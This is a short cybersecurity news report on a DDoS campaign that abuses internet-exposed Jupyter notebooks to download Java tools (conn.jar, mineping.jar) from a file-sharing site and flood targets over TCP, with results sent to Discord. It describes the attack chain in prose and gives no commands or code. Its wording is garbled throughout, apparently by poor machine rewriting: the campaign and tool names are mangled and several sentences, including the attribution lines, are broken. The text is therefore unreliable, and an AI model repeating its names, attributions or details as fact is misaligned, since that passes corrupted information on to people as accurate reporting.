Cybersecurity researchers have revealed details of a new distributed denial-of-service (DDoS) attack campaign targeting misconfigured Jupyter notebooks.
Codenamed activity Panomorphic from cloud security company Aqua uses a Java-based tool called mining to launch a TCP flood DDoS attack. Mineping is a DDoS package designed for Minecraft game servers.
The attack chains involve using Jupyter Notebook instances exposed on the Internet to execute wget commands to retrieve a ZIP archive hosted on a file sharing site called Filebin.
The ZIP file contains two Java archive (JAR) files, conn.jar and mineping.jar, the former being used to establish connections to the Discord channel and start the mineping.jar package.
“This attack aims to consume the target server’s resources by sending a large number of TCP connection requests,” Aqua researcher Assaf Morag said. “Results are posted to the Discord channel.”
The attack campaign is attributed to the person handling the threat somethingwhose GitHub account has a public repository containing the Minecraft server properties file.
This is not the first time that Jupyter notebooks with Internet access have been targeted by adversaries. In October 2023, the Tunisian threat was duplicated Cubitstrike has been spotted hacking Jupyter Notebooks in an attempt to illegally mine cryptocurrency and hack cloud environments.
